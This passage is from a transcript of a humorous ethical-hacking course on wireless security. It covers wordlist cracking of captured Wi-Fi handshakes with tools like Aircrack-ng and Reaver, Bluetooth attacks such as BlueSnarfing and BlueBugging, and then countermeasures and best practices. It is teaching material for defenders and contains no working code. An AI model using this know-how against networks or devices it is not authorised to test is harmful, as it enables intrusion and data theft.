case here, referencing a word list, a dictionary word list. And then the root/desktop/*.cap path is to
use all the cap files in that structure with that attack. Now, the cracking will only happen if the words in
the word list that I've specified here. And depending on the length of your word list, it could take you
some time.But eventually, if you're lucky, you might get something like this as your result, showing
you that the pass phrase was discovered, and that the pass phrase is not secure at all. I might
recommend at this point of changing someone's password.Now, just because we're not using PCs
anymore doesn't mean that we don't have this capability. As far as mobile cracking is concerned, there
are several products out there that work on both Android and Apple devices. I'm not going to tell you
which ones are the best. Just know that they exist out there, and be aware of them so that when you
are inventorying individual devices, you understand what the software is and what it's designed to
do. Yeah, look at that, they even have a Reaver versionfor Android. Woo-hoo!

Summary
So in this module, we went through and took a look at a lot of stuff. We first went through and took a
look at how to discoverWi-Fi access points or Wi-Fi networks. We also then talked about how we could
zero in on those because there's no physical way to see the wiring of a wireless network. I know that
sounds weird. But we use GPS to help us pinpoint where these networks are located. We also then
went through and took a look at wireless traffic analysis, doing things like reconnaissance, looking for
vulnerabilities on the wireless network, and using our cool tools such as Wireshark or OmniPeak. We
also stopped for a second and talked about wireless network cards. Not all of them are created
equally, and some of them will give you more features as far as wireless hacking is concerned, while
others will just limit you altogether. We then got into taking a look at launching the attacks using
Aircrack-ng and its suite of utilities, finding hidden SSIDs. And then after finding the networks,we went
in and cracked the Wi-Fi encryption. Again, several different products can be used to accomplish this,
whether it's KisMAC, Aircrack-ng, Cain & Abel, or even Reaver. And of course we took a look at how
we could do that with Reaver as well as Aircrack-ng. "Gee, Dale, that's really cool. "Is that all the
wireless we need to worry about?" No, there's one more medium that we can use, or that we have to
be careful about. And I'll give you a hint. ♫ I feel blue ♫ I will give up my day job.

Hacking Bluetooth

Hacking Bluetooth

So, Bluetooth isn't normally something we would consider an attack vector, but it really is. It's a
technology that allows for devices to share data over somewhat short distances. So don't get down in
the dumps. I don't want you feeling like, oh yeah, I got to do a quote, right? And who knew that I could
throw in Big Bird along with hacking? But if you haven't seen that movie, Big Bird actually sings the
song "I'm So Blue". In fact, if you don't shed a tear while watching that scene, you're heartless. Well,
in this module, we're going to go through and take a look at the different methods to the madness of
hacking Bluetooth. We'll go through and take a look at the threats that Bluetooth provides, or creates,
I should say. Then we'll make sure you understand some of the new terms that are going to be
presented to you. Oh, I can't wait for this one. Then we'll also make sure you understand how
Bluetooth, at a very high level, works. And, of course, we'll look at its security mechanisms. And then,
of course, it can't be complete unless we talk about tools and attacking. So cheer up, and let's get
going.

The Threats

"So, Dale, is Bluetooth really a threat?" Well, let's think about it for a second, folks. What devices do
you have that have Bluetooth in them? Uh-huh. And what are you storing on those devices? Maybe
calendars, contacts, birthdays? I've got a family member that's created a contact called "passwords",
and guess what she lists there? Oops, did I say "she"? You know, these devices are subjective to the
same type of things we see with other wireless communication, such as any type of malicious code. In
fact, I might be able to gain remote access, and then obviously get a hold of that
information. Sometimes with or without your knowledge. Other times, I may use social engineering. In
fact, this is the big thing going on right now, is that attackers are tricking Bluetooth users to lower the
security, or even disabling authentication for Bluetooth connections so they can pair them up and
steal the information off of them. Now, it's even worse when you think about that remote
accessconcept, because with it I could remotely control the device. I could have your device make a
phone call to a 1-900 number, or use some type of service that charges money to your account. As we
mentioned, mobile phones and worms are all over the place, and we can transmit those via
Bluetooth. And then have it replicate itself via Bluetooth. I could use your phone to send out SMS
messages. If I really want to have fun with you, and you get charged per SMS message, I can rack up
quite the phone bill for you. In fact, I could turn on debugging, and activate it so that I could record
your phone conversations and forward them to me. All in all, if you want to sum this up, anything that
you store in these type of devices will be mine! Insert evil laugh here.

New Terms

Now I know by now you're little brains are probably overloaded with tons of acronyms and terms, but
you're going to have to make some room for some new ones, especially when it comes to
Bluetooth. Let's first talk about something called BlueJacking. BlueJacking is basically sending
messages via Bluetooth from one device to another, without the consent of the user. Kind of like
spam. You know, it's relatively harmless. The attacker can't actually access any information, or
intercept messages, but he can use BlueJacking as a way of social engineering a target to do something
on the phone, because a message told him to do it, thinking that it's an official thing. Like, "turn on
your wi-fi and hook into this access point". Plus, it's just really annoying getting a ton of BlueJack
messages. Another term is referred to as, yep, (lips smacking and kissing)BlueSmacking! That's from
me to you. (laughter) This is actually a denial of service attack that causes a buffer overflow. And it
does it basically through a ping of death, through ICMP packets being sent to the Bluetooth
device. Here's another one, I always laugh at this one too. It's called BlueSnarfing, and you may be
wondering what this picture has to do with anything.Back when I was a young father, there was a TV
series on that I used to watch with my daughter. It was called Thundercats and the comedic relief for
the Thundercats was this creature called Snarf, and he'd go "Snarf Snarf". So anytime I hear
BlueSnarfing I always laugh. And no, that's not me dressed up for a cosplay. Now, BlueSnarfing is much
worse that BlueJacking, because it does allow the attacker to get in to some of your information. With
this type of an attack, the attacker uses a special software to request information from the device via
Bluetooth Push Profile. And the attack can be carried out against the device in invisible mode, but this
is less likely due to the time needed to figure out the device's name through guessing. Another term
that you need to be familiar with is something called BluePrinting. Can you guess what it does? Hang
on, I know what you're thinking. It has something to do with printers, right? No, BluePrinting is simply
a footprinting method.Aah, now you see the correlation between BluePrinting and footprinting,
huh? Well, this method allows the attacker to find out the model and make of the device that they're
going after. Another term that we use is called BlueBugging. Now, BlueBugging is when the attacker
is able to gain remote access to the target Bluetooth-enabled device, without the victim being aware
of it. And it gives them full access to the AT level commands of the device, which means they would
haveread/write access to text messages and their phonebook, or contacts. Now BlueBugging was
actually developed after the onset of BlueJacking and BlueSnarfing. It's just on steroids. Now, outside
of "Blue" we still have access, or the ability to make use of, other technologies or attack vectors that
we've talked about already. One being the famous man-in-the-middle impersonation attack. During
this attack, the device intended to pair with each other unknowingly pair with the attacker's
device. And therefore acts as a man-in-the-middle. We also have the famous MAC spoofing. We all
know what this is, right?This is a passive attack, where the attacker spoofs the MAC address of the
targeted Bluetooth-enabled device, in order to intercept the data being sent to the targeted
device. Now, that wasn't so bad, right? Now, a couple of these terms you're going to want to make
sure you're very much aware of for your immediate future. In particular BlueSmacking, BlueJacking,
and BlueSnarfing.

All About Bluetooth

So, let's talk about Bluetooth. Isn't that an interesting name, Bluetooth? So, Bluetooth was actually
created by Ericsson, a famous telecommunication company, and they have a Swedish
background. When they were coming up for a name for it, the Scandanavian creators recalled a
legend of a Danish Viking king, King Harald Blatand. I think that's how you pronounce it, I'm not
Swedish. But, according to legend, he had an uncanny ability to bring people together in non-violent
negotiations. And his name translated to English is, you guessed it, Bluetooth. And Bluetooth got its
start, really, back in 1989 when it was first created. But it wasn't really caught on, or there wasn't a
lot of devices that supported it. It was actually designed to be a replacement for cabling. It was
designed to be low-powered. In fact, its original name was called "short link radio technology".And
when we say low power, we're not really talking about distance, we're talking about consumption of
energy. Developers are actually able to create smaller sensors that run off those tiny coin cell batteries
for months. But again, it is designed for short distances. Originally, we got about 10 meters out of
it. Well, kind of. The newest implementation of Bluetooth, Bluetooth I, can get up to 100 meters. Now,
when it comes to how Bluetooth actually operates, it goes through a pairing process. When you pair
up a device, say for example your phone to your vehicle, or your phone to your headset, during that
pairing process some information is transmitted: One, the name of the device. It also includes the class
of the device. Is it an audio device, a mic, a display? As well as the services. For example, I have a
Bluetooth speaker, that when I hook into it via my phone, the speaker itself can also answer calls
because the services that it supports is not only audio, but recording. There's also some technical
information that's transferred back and forth, including the Bluetooth MAC address, as well as the
pre-shared secret.Oh, no, the pre-shared secret. Yeah, that's the dilemma, because when the two
devices pair up, they exchange this pre-shared secret, or link key, and each stores this link key to
identify each other for future pairing. So the next time I turn on my phone with my speaker, it
automatically hooks back up. Do you see where we're going with this one? Now as far as the frequency
that's utilized, it's the standard 2.4 GHz frequency using frequency-hopping spread spectrum. And it
hops around the channels at about 16,000 per second, which is kind of a security mechanism
itself. But, trust me, I've got utilities out there that will help me find Bluetooth devices. Now, besides
using frequency-hopping as a security mechanism, again remember both the master and slave have
to know the hop sequence. We also have the pre-shared key that's exchanged at pairing. But then
there's also three different modes. The first mode is Discoverable mode. This is the mode we are
probably all used to. When you try to pair up a device, you make it discoverable, which means it will
respond to any inquiries that are made to that device.Now, this mode should only be turned on while
making the connection for the first time. Upon saving the connection, the two devices will
remember each other, and therefore the Discoverable mode isn't necessary at a later point. We also
have something called Limited mode. Limited mode is exactly what is sounds like, it's only responding
for a limited time. Most of our phones today when we make them discoverable, have a timeout, at
least my phone I think has two minutes before it becomes non-discoverable. Whoops, I just gave away
the third one. Yep, Non-discoverable mode basically means that it prevents the device from appearing
on anybody's lists of available Bluetooth devices in the area. However, it's still available, or visible, to
those devices that it's paired with previously. Now, there are two pairing modes that are available as
well. The first one is referred to as Non-pairing, and just like the name sounds, the device itself rejects
any pairing requests made by any device. Versus Pairable, oh I'm sure I've got a story there, I should
say Pairing mode, the device accepts a pairing request upon receiving and establishing the
connection with the pairing requested device. So it's a two step process. First, we have to be
discoverable, and then we have to have a pairing mode.

Security

Now, when it comes to Bluetooth, security is a big issue for us. And the reason why security's such an
issue is because of what Bluetooth isn't. First of all, Bluetooth itself is not secure. Not only in its
implementation, but there's actually some very serious flaws in the design itself, because again,
technically it's being used for something today that it wasn't designed to be used for.I'll touch on that
here in just a second. Also, everyone has this concept that Bluetooth is short range. Again, this is
changing up with different classes. Class I Bluetooth devices have a range of up to 100 meters. So, just
because I'm a little bit further away from you, doesn't mean that you're safer from me. And also the
aspect that , let's face it, even though Bluetooth is old, it hasn't grown up yet as far as the
communication method is concerned. Or, I should say, as far as communicating securely is
concerned. With smartphones, it has turned into something totally different than what is was meant
to be. It was created as a way to connect phones to just simply peripherals. Now, Bluetooth does so
much more than that, and no one has taken a look at the underlying security mechanisms of it. But
it's becoming such a standard de facto now, that everybody leaves it on. I'll be honest with you, I've
got a smart watch that has a Bluetooth connected to my phone all the time. So what does that tell you
as far as Bluetooth around me is concerned when I'm traveling? Yeah, guess what, I turn it off when I
travel. But when I'm at home, I leave it on, and I hope I remember to turn it off, but we're all
human. Because that connection is there, if I'm not careful, somebody, given enough time, could get
into my phone just by looking at the traffic between my watch and my phone. Just because I have my
watch on my hand and my phone in my pocket, doesn't mean the signal doesn't go beyond my pocket
and my wrist. It's broadcasting outward in a 360 degree area. So, the question then is, what's our
vector, Victor, as far as attacks are concerned? Well, our vectors are very easy. First of all, oh my gosh,
defaults, defaults, defaults. Hello, folks. And it's too frequent that individuals actually abandon proper
setup of systems and devices for the convenience of the "out of the box configuration". Some devices
have the Bluetooth radio turned on by default. Or their security mode is set to one, which is the lowest
security. We'll talk about those modes a little bit later. But just so that you understand, mode one says
no encryption is required, nor authentication. And do we need to talk about the default pass
keys? Hello, one-two-three-four, zero-zero-zero-zero, one-one-one-one, did I just guess it? Another
vector for us is going to be, obviously, theft and loss.Listen, our devices are getting smaller and more
powerful, which is really weird that such small devices are more powerful than systems we had years
ago. But greater portability means the potential for loss and theft The device can perform more
functions, store more data, however if these get into the hands of an attacker, these devices that we
now carry with us can perform more functions, and store more data than ever. This, however, makes
them a greater instrument, or target, for an attacker. Either physically by taking them, or by linking
into them. So, one of the convenience thing about Bluetooth is that itremembers its passkey with
another Bluetooth device, so it re-syncs up the next time it comes into play, right? Well, guess
what? Typically, these keys are stored in non-volatile memory, which means that if I can get a hold of
the key on the phone I'm pretty sure it's the same key being used on all your devices that are
connected to that phone. So then we talk about eavesdropping and impersonation. Now, what we
mean by this is that we allow an attacker to intercept or listen in or onto communications between
two or more devices. Now, here's where the frequency-hopping comes into play. It makes it a little
more difficult for us to listen in since it is hopping around. But if I can figure out the frequency-hopping
algorithm that you're using, or the hop sequence, I can simply listen in. In fact, to just circumvent the
frequency-hopping algorithm, all I have to do is use another Bluetooth listening device that's modified
to listen to all frequencies. And I bet you'll guess that I've got a tool for that, right? It actually turns the
device into a sniffer for Bluetooth. The other vector that we need to be concerned about isreferred to
as a person-in-the-middle attack, or a PiTM attack. "Whoa, wait Dale. I thought is was man-in-the-
middle-attack?"It's basically the same thing. It's, again, where the attacker, who already has the link
keys of the two Bluetooth devices, can intercept the communication and initiate new communications
to both devices, posing as each other. Via Bluetooth, there has to be a master and a slave. Typically
your phone would be the master, your headset would be the slave. And that actually creates what
they refer to as a piconet. "Oh, come on Dale, you're making things up now" Nope, that's what we call
it. It's an ad-hoc network. Well, by doing a person-in-the-middle attack, we actually end up creating
two piconets, since both devices are considered slaves and masters. And, of course, we all know about
DoSs, right? Denial of Services? Well, it is possible on Bluetooth systems, even though there hasn't
been a lot of documented cases on it. Obviously just like any Denial of Service attack, it results in the
device losing the ability to access other Bluetooth resources. Now, sometimes the Denial of Service
attacks are done without our knowledge, or without an attacker being nearby. "Uh, say what
Dale?" Well, that's because again, Bluetooth operates on 2.4 GHz, and there are some other devices
that are around your house that might interfere such as microwave ovens, cordless phones, or
anything else that may be on the 2.4 GHz frequency. And there's also another type of Denial of
Service. This one's kind of interesting. This is where the attacker attempts to exhaust the power on the
portable device, and they accomplish this by flooding the target device with requests for data
transfers. Or create a connection to the point where the target device is drained of power. Now, that
particular type of vector doesn't really compromise the security,but rather it's just annoying that
your battery drains quickly.

Summary

So, in this module we went through and took a look at Bluetooth. In the aspect of first we looked at the
threats that it creates.Again, think of all the devices that we have out there that have Bluetooth
enabled on them. Some of them we don't even realize, or maybe we're not even utilizing it. I just
discovered last week that my soundbar for my home theater system has Bluetooth enabled on it. And
we also talked about how this platform is actually overlooked quite a bit when it comes to security. So
then we talked about different terms that you need to be aware of. We talked about BlueJacking,
BlueSnarfing, "Snarf Snarf", see, you're going to think it now. BlueSmacking, as well as BluePrinting
and BlueBugging. We then went through and talked a little bit about Bluetooth, what it was originally
designed for. The different modes that is has. Not only the Discovery modes, but also the Pairing
modes. And then we went through and took a look at the security of Bluetooth, or in some cases the
lack of. Some of the security mechanisms are built in, like the frequency-hopping aspect. Some of
them I'm not too crazy about. Then we went through and took a look at some of the cool tools, and
some of the attacks that they couldimplement for us against Bluetooth devices. Now, by this point of
all my courses you are all shivering in the corner, scared to look outside. Next, we're going to take a
look at some countermeasures. Maybe one of those countermeasures is to turn on a hall light for you
so you're not so scared.

Countermeasures

Countermeasures

Okay, so now that we've talked about the big, scary wireless, let's talk about countermeasures. Now,
we've discussed previously also why we need to have countermeasures, and I think the Dalai Lama
sums it up the best. He said, "Forgiveness doesn't mean forget what happened. If something is serious
and it is necessary to take countermeasures, you have to take countermeasures." Such a wise
statement, huh? So in this module, we're going to go through and take a look at the different
countermeasures that we can implement to help protect us when it comes to bluetooth, as well as
we'll look at how to prevent rogue access points from hitting our network. We'll then go through and
take a look at the 6 layers of wireless, it's like an onion, there's layers. (Laughs) And then we'll take a
look at some of the best practices. And of course, any module wouldn't be complete unless we talked
about some of the tools that can make our lives a little easier.

Bluetooth
So let's start off with countermeasures for bluetooth. Eh, don't feel so sad, this is actually kind of
easy. The first thing you want to do is some of the obvious things like stop using default PINs like 1234
or 1111. Make sure that your bluetooth devices are kept in non-discoverable mode. Hey, if you can't
see it you can't connect to it. Better yet if you don't need it, turn it off. I only have my bluetooth on
when I feel like I'm in my safe zone, which is getting smaller and smaller all the time. Also, check your
paired devices. Make sure there's nothing random all the sudden showing up as a device that you've
paired up with. And don't accept any unexpected requests. And if your device supports it, make sure
that you implement Link Encryption on all connections.Now there's also four different security modes
that bluetooth supports. Now depending on the device and the developer, they can implement some
security modes. There are four security modes for bluetooth to access between two devices. Those
modes are typically broken down by either level 1, or mode 1, which is little or no security, mode 2
which is service level enforcement security meaning depending on what services we're going to
use will determine the security that we implement.Mode 3 is link level enforcement or LLE which this
means, for example, if I was communicating with my car I might want to have some security
enforcement, but if I'm just talking to my speaker, I may not need it. And then there's also mode 4
which isLLE with encrypted key exchange. Now the manufacturer of each product will determine the
security modes and technically there's a mode 5. That's where I find the device and crush it with my
bare hands.

Rogue APs

Ah, rogue access points, one of my favorites. When it comes to countermeasures against these type
of devices, what we wantto do is obviously be a little proactive. One of the things we can implement
is something called access point scanning. This is like controlling traffic, being aware of what's on the
network or what's in the wireless world around you. It should be monitored 24/7. Now, a lot of the
wireless intrusion prevention systems, or WIPS, out there support this capability. Some of them have
some really cool features like being able to automatically block. And some of these WIPS have the
ability to do things like block the switch port in which the access point is connected to. That can also
be done manually. You also might be able to kind of think outside the box. Use some of the features
that these access points now come with, or how about even utilizing some things we've already
learned like through a denial service at the rogue access point. Yeah, turnaround's fair play, right? We
can also implement something called RF scanning. Got any old access points lying around? Why not
re-purpose those and deploy them throughout your network infrastructure. Most access points have
the ability of detecting new AP's that are popping up and sending notifications. Then there's wired
side inputs. This is basically a software solution, most of the timecoming with your network
management software products, that is able to detect access points that are rogue and then shut
down their environment. These network management software programs are able to detect different
devices via Telnet, S & NP, as well as obviously, Cisco discovery protocols. You can also implement my
favorite, open up a can of whoop-donkey. Yeah I know, I wanted to use a different word there, but
you get the idea and what I mean by this is go and block the switch port.Or, I like to track it down with
a vengeance. When you find a rogue access point, obviously, you want to pull it, and ask questions
later. I don't care who's device it is. If it's on your network, you need to pull it. I also like to see if it'll
take off like a Frisbee across the room, and if that doesn't work, one of my other defaults is to just
simply accidentally drop it multiple times.

6 Layers of Wireless

So let's take a look at the 6 layers of wire security. Every time I hear 6 layers I always think of, yeah,
the 6 layers of Kevin Bacon and I'm sure that if I start with access points, within 6 layers, I'll be able to
get to Kevin Bacon. But instead, we'll actually talkabout wireless security here. The first layer would
be obviously wireless signals. In wireless networks, the continuous monitoring and managing of the
RF spectrum within your environment helps to identify threats and makes you aware of its
capabilities. You may want to invest in something like an IDS system or even any wireless intrusion
detection system, a WIDS.We've also talked about WIPS, when you start to see activities such as an
increase in bandwidth usage or interference in the frequency. It might indicate a malicious
intruder that is coming onto your network. Previously, I talked to you about how to limit the linkth of
the transmission of your wireless by using a reflector of some sort. I've also heard of users
removingantennas from access points. Just because the antenna isn't physically attached doesn't
mean that the access point doesn'tcontinue to operate, it just gives it a stronger signal. Well, if the
signal is going too far, do yourself a favor. Try taking the antenna off, and then looking at its
transmission distance. Data protection is another layer within wireless security and obviously we've
talked about the use of WPA2 and AES. These encryption algorithms should help to protect your data
during transmission. Again, it's not full proof because of witnesses and other subsystems. Another
layer is device security. Not only the physical layer of the device but also making sure that the device
is up to date via patch management and scanning these devices for vulnerabilities. And when I say
scanning for vulnerabilities, I'm not necessarily saying hitting the device itself but doing research to
see if there's any vulnerabilities that have been listed by the manufacturer or third parties. Another
layer would be connections security. Per frame or packet authentication provides the protection
against man-in-the-middle attacksand makes it almost impossible to accomplish. It does not allow the
attacker to sniff data when two authorized users are communicating with each other. I would also
maybe take a look at centralizing that encryption method obviously the centralization of this
encryption like a radius server requires additional security on the back end. Another layer would be
network protection meaning that strong authentications ensures that only authorized users are able
to gain access to the network and its resources. When we say strong authentication we're not only
talking about the encryption on authentication mechanisms, we're talking about how long the
passcodes are pass phrases. Witnesses at that level make us extremely vulnerable. And finally, end-
users. Uh, say what, Dale? Yeah, believe it or not, if an attacker is able to associate with an access
point, you ready for this? Presonal firewalls, I know we hate them especially when it comes to the
Windows platform.Everybody has this tendency of disabling them, but these personal firewalls
installed on the user's system on Wi-Fi networksprevent attackers from gaining access to files. And of
course, "Firewall" was a movie with Harrison Ford who was also in "6 Days and 7 Nights" with Bed
Bode, who was in "Apollo 13" who obviously starred Kevin Bacon. See, I got there!

Best Practices

So, let's take a look at best practices because typically this is where we have the most control as
security professionals. And when I say best practices, I actually mean for the love of Pete,
please. (Laughs) Let's first start with configuration. Well, when it comes to wireless, do yourself a
favor and change the default SSID, in fact this might be a great opportunity to practice something that
I always talk about and that is misdirection. For example, if I have a D-link router I know the default
SSID is called D-link. I'll switch to, oh I don't know, link-sys or tsunami. A different manufacturer
because when an attacker is war driving through my neighborhood or through a business environment
and he sees D-link, he'll throw D-link attacks or vulnerabilities at that device which obviously won't
work. Now, if you don't change the default username and password you deserve to be hacked and yet
so many people don't do this. I actually think it should be a standard feature when you do a setup of
a new access point that it should tell you to change the default username and password. I was recently
shocked with my new netgear wireless access point, I can change the password but I can't change the
username. Kind of discouraged there.Also, disable SSID broadcasting. Again this is going to necessarily
stop an attacker, but that's not your job because that job is impossible. Your job is to slow them
down. They have to be looking for hidden SSIDs. Also, disable remote login and wirelessadministration
to the device. The last thing you want is the attacker to be able to gain access to the device via
wirelessly. Let's make it a little bit harder for them. Make it so that you have to be on the physical wired
network to manage this device. Enable MAC filtering. Again, this is very similar to disabling the SSID
broadcasting. It's not necessarily going to stop them, but it is going to slow them down. And in fact if
I slow him down enough, I'm going to hopefully discourage him. And do yourself a favor, I know this
is a pain in the cahooskies, my family hates it but change the passphrase often or it you start to see
some suspicious activity on the network or that device in its log files, definitely change it. I know, that
means you have to go through and change all the passphrases on all your devices. But let's think about
that one for a second. Is that really a pain or is recovering from an attack a bigger pain? Okay, so now
that we're done with configuration best practices, let's talk about how do we handle authentication
best practices. Remember what I said about if you don't change the default username and password
you deserve to be hacked? Well, that implies also to if you're still using WEP. Now, granted, if that's
your only choice because, I don't know, the device is so old, it's better than nothing. But if the device
is that old, I honestly think it's time to upgrade. Make sure that also you update drivers on all the Wi-
Fi devices. Again I go back to this aspect that we're all so muchaware of updating our applications,
especially like on our mobile devices, or we update our OS's. Famous patch Tuesday, right, for
Microsoft. But I always ask people when is the last time you updated the firmware or the drivers on
the Wi-Fi devices? This should be done at a minimum of at least once a year. I would preferably see
this on a task list for yourself to be done every quarter. Now, we've talked also about creating the
centralized authentication server. Remember our radius server? And again, that's going to require
some best practices as far as locking it down. And here's one you may not have thought of but guess
what? If you're not using it, turn if off, please! Just because you have the ability to be wireless doesn't
mean you have to have it turned on. Now, because wireless is one of the attack victors that an attacker
can come in on, the other one obviously beingthe physical network, we need to make sure that we
secure the physical site of the Wi-Fi devices, and that can take several different approaches. For
example, access points, I try to hide them up inside of ceilings, especially if I have a drop ceiling. I don't
want people to see that I have a Wi-Fi access point somewhere they're located. Yeah believe it or not,
in PIN testing, I'llactually go through and case the joint, which means I walk around and look to see if
I can see any access points that tells me right away if there's Wi-Fi available. Next time you're in a
retail store, look around. I'm really shocked, especially the big warehouse stores like Sam's Club,
Costco's, or Wal-Marts, you can see those bad boys everywhere. So, now that we've done
authentication, let's take a look at some best practices for the SSID settings. Now we've mentioned
already of changing the SSID or the default SSID and also hiding it. This is also known as SSID cloaking. I
once read an article out on the internet that had three reasons why hiding your wireless SSID was a
bad idea. And one of the three options was hiding your wireless SSID tempts bad guys. Uh, guess what,
you're already tempting them the fact that you have a wireless network! Now, we can also argue
whether it's a waste of time because as we've seen, we can detect those but that does require a
different level of attacker. Also when you name your SSID, oh please, top line, for the love of
Pete, don't use anything identifiable like the company name, the address, your last name. At that
point, you're just making things almost too easy. As far as the layout, you should also make sure that
you place a firewall or a packet filter between the access point and the corporate network. That's
almost a drr moment, right? Make sure that you check all the settings after updating the firmware on
your devices. We talked previously about making sure that we update the devices themselves, or at
least the firmware. Well after you update them, all of your settings are typically saved but new
settings that the firmware offers are set for new defaults, so you need to review that information. I'm
also a big fan of backing up your configurations so in case you goof things up, you can always restore
them. We also talked about limiting signal strengths. Speaking of removing antennas which we
talked about earlier, back in the old days, (old man voice) back when wireless was brand new, (regular
voice) we actually had a D-link. There was a famous D-link router and I can't remember what it is off
the top of my head but if you removed the antenna, you actually got a stronger signal. That's because
the antenna they included was actually a governor, or a limitation, it was stifling the signal.Kind of
funny, and I think that was back when 802.11b was the big bad boy on campus. And let's think about
some other encryption technologies that we can use with wireless. Oh, for example, IPSEC for wireless,
or setup a VPN tunnels between wireless users and access points. Anything, again, to slow our attacker
down. Now I do need to probably give you a caveat here and that is every time we add additional
protections to our systems, we do end up infecting performance as well as creating some
complexity. And as you all know from my previous courses, any time we hear the word complexity, we
have to associate with it the possibility of additional security holes being made. So, it takes a very
vigilant IT security professional to keep up on all of this. But hey, that's what you're here for, right?

Tools

So, we finally talk about tools. I'm going to give you kind of a 10,000 foot view here of the tools you
should be utilizing as well as some on my own personal favorites. Some of the tools are software
based, some of them are hardware based. And let's face it, if you don't have a tool, you're a fool. See?
I'm a poet and I didn't know it. I made a rhyme, I'm so fine. I'm going to start rapping here in a
second. (laughs) We've talked about previously what we refer to as WIPS, or wireless intrusion
prevention systems. These are typically made up of several components that actually work together
to help give you a great and complete monitoring solution. Those things can include the ability
to monitor access points or put them in monitoring modeso we can see what's going on the network as
well as looking as suspicious traffic. Cisco makes a great product that's based off the Cisco discovery
protocol, where they include a central point of alarm integration for all their controllers. They have a
local mode for AP's which provides a wireless service to clients in addition to doing time-sliced rogue
and location scanning.There's other software out there, including products like AirMagnet, Zenworks,
which has a great plugin in for WIPS. There's also AirTight, and a currently in open project called
OpenWIPS-ng, and I'll bet you never guess who's behind that one, and I'm sure that some of
you already have some solutions in place. My big thing for you is make sure you keep these things up
to date and don't get complacent with them. As far as hardware is concerned, I did find an easy
solution, it's actually quite simple. You can get it on Amazon even with Prime shipping for about $35,
it's called the Bat. Some people refer to this as a low tech solution, but if I find somebody's trying to
hack my Wi-Fi network, I simply break it out, make eye contact and chase after them. Of course, if
things get really bad you can always just throw up the signal as well. Da, da, da, daaaa, da! (sings
Batman theme)

Summary

So in this module, we went through and took a look at several different countermeasures. We talked
about the countermeasures for bluetooth. If you recall, we talked about things like stop using default
PINs, disable it when you don't need it. Check your paired devices as well as the obvious, don't accept
unexpected requests. Trust me, this isn't like a social networking platform where I'm trying to get as
many friends as possible. I want to limit the number of devices, or at least make sure I'm aware of who
they are. We also talked about the countermeasures for rogue access points, that included
obviously, scanning for access points 24/7. Remember, we even talked about reusing old AP's, putting
them in monitoring mode so we can see when new access points come into our environment. And of
course, we talked about what to do when you find the rogue AP. Remember, you pull it, ask questions
later, and then accidentally drop it and stumble and step on it several times. We then went and took
a look at the 6 layers of wireless security which included things like monitoring the wireless signal
handling data protection via WPA2 and AES, using strong authentication at the network protection
level, and believe it or not, yes the firewall at the end-user level. Then we talked about some of our
best practices, both for configuration as well as authentication and the SSID settings. And finally, we
talked about some of our favorite tools out there and most of those tools will provide you with a 30
or 60 day evaluation. Just make sure the tool meets the needs of the requirements for your
company. The bat always meets the requirement of my company. So that's going to conclude
our hacking wireless networks course. I really hope you guys enjoyed it. I hope you learned something
but better yet, I hope you go implement something that you've learned. Thanks a lot.